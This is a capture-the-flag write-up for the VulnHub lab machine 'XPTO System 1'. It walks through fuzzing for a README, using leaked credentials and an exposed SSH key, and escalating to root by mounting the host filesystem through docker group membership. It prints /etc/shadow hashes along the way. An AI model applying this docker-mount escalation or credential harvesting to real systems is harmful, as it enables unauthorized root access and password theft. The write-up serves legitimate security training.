https://www.vulnhub.com/entry/xpto-system-1,635/
Scan ports, 80 and 1337(ssh) are open.
Nmap told us there is ".git" folder, then I use GitTools, but get nothing useful.
We continue to scan port 80.
Check source code of login.php, we notice there should be a README file.
We use wfuzz to get the extension of README file.
┌──(kali㉿mykali)-[~/Documents/xptosystem] └─$ wfuzz -w /usr/share/seclists/Fuzzing/extensions-compressed.fuzz.txt --hh 276 "http://192.168.33.130/README.FUZZ" /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.33.130/README.FUZZ Total requests: 186 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000081: 200 23 L 53 W 363 Ch "md" Total time: 0 Processed Requests: 186 Filtered Requests: 185 Requests/sec.: 0
Check the content of README.md, find a usrname:password pair, and a folder "/delete-me".
┌──(kali㉿mykali)-[~/Documents/xptosystem] └─$ curl http://192.168.33.130/README.md #TODO - Consertar a pagina de logout - Criar a pagina de dashboard pos login #Comandos uteis ##Start container $ docker run --name webserver -d -p 80:80 -v ~/http:/var/www/html php:apache ##Stop container $ docker stop webserver ##Start container $ docker start webserver ##Image list $ docker images ##Credential web:pipocadoce ### View Access /delete-me
Visit /delete-me, we get a ssh private key.
┌──(kali㉿mykali)-[~/Documents/xptosystem] └─$ curl http://192.168.33.130/delete-me/ <html> <head> <title>Key for Access</title> </head> <body> <h2>Follow access data for server</h2> <pre> b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABC13HPc3c tLDiaRrkdVlYzNAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQC7NKnI03+l ... wI21jo1EbjVLKbJrIQEJFGzmPLBUEspriCY3BTIdXNl1jxgUZ4RRR6hirIjm66DZIfrK/d yO+JHU72kIccUQTAI3EMmtkxI3b6u+Y1BpKyKKq/BVLlhQnrUpXqPuJCJEz9cqQ8gRNmaa zq6sb9anB+QPpgBYUdUOVZ9nwzfAw= </pre> <h1>Good Luck ;)</h1> </body> </html>
Download the ssh key data as file id_rsa, and modify it to the right format (add the BEGIN and END lines). Don't forget to chmod 600.
┌──(kali㉿mykali)-[~/Documents/xptosystem] └─$ cat id_rsa -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABC13HPc3c ... yO+JHU72kIccUQTAI3EMmtkxI3b6u+Y1BpKyKKq/BVLlhQnrUpXqPuJCJEz9cqQ8gRNmaa zq6sb9anB+QPpgBYUdUOVZ9nwzfAw= -----END OPENSSH PRIVATE KEY-----
Now we can enter ssh as user "web", with the password of the ssh key.
In home folder, there is remember.txt, we can find the password of another user, which is a rabbit hole.
I enum a lot, but can not get root. Then let's check the author's note on VulnHub.
Our goal is to get a hidden directory, the directory's name is the password of root.
Good thing is, user "web" is in docker group.
There is only one image and one container on the machine, which is the web server.
We can mount the root folder into docker, when we can have root privilege at the same time.
web@xptosystem:~$ docker run -v /:/mnt -i -t php:apache /bin/bash root@e07d13fc2299:/var/www/html# cd /mnt/root root@e07d13fc2299:/mnt/root# ls -la total 24 drwx------ 3 root root 4096 Sep 3 2020 . drwxr-xr-x 18 root root 4096 Mar 16 02:40 .. -rw------- 1 root root 10 Dec 17 21:18 .bash_history -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc drwxr-xr-x 3 root root 4096 Aug 20 2020 .local -rw-r--r-- 1 root root 290 Aug 20 2020 .profile root@e07d13fc2299:/mnt/root#
Then we can get the root password hash.
root@e07d13fc2299:/mnt/root# cd /mnt/etc root@e07d13fc2299:/mnt/etc# cat shadow root:$6$o/k7d563qPPliQWL$cc4vN4uZ6dmh4YoP/pnHdZz3xZExq1N.J83sfWRJy3wdIrXKjTPER3bcQKDaHYBjA/6EsA6c9Zj5zGL3VLEMm1:18508:0:99999:7::: daemon:*:18494:0:99999:7::: ... sshd:*:18494:0:99999:7::: systemd-coredump:!!:18494:::::: web:$6$6caYruQd7gWLfrGs$w.VkTioPN.TvWEZ1lTsj/QSzGoMHxHmTSJUHQrLvQ0k5Dll/A.wDevhJQR2bMIZqgTAJd0dq9K3PLFjhX1Lj7.:18494:0:99999:7::: sysdev:$6$CMnj1i3VnF0Dev7p$4LssZsU4sW7cRVf7tEcth4vmB8umVzae6FLTrEDQI.SFJFeVme.uTe5Ws8GxpZO5cXRUAD8kcbJYuxIL2AX0e/:18508:0:99999:7::: root@e07d13fc2299:/mnt/etc#
We can burte force the password hash, but I prefer find other ways.
Let's find a special directory that made less than 4 months. ( Because the author made the machine Dec. 2020)
We need "-not -path" to filter some folders/files we don't need.
Here is my command in docker.
root@e07d13fc2299:/mnt/etc# find /mnt/ -mtime -120 -not -path "/mnt/proc/*" -not -path "/mnt/sys/*" -not -path "/mnt/var/lib/docker/*" -not -path "/mnt/run/*"
Then we get a strange folder.
If we directly visit the folder in VM, we have no access.
In docker, we can read the secret file in this folder. (And this folder's name is really in rockyou.txt, so we can brute force it.)
Check the file type, it's PDF.
We can copy the secret file to /mnt/tmp of docker, which is /tmp folder of the VM.
And chmod 666 so we can read it.
At last, we download the secret file from VM, and open it. Here is the flag.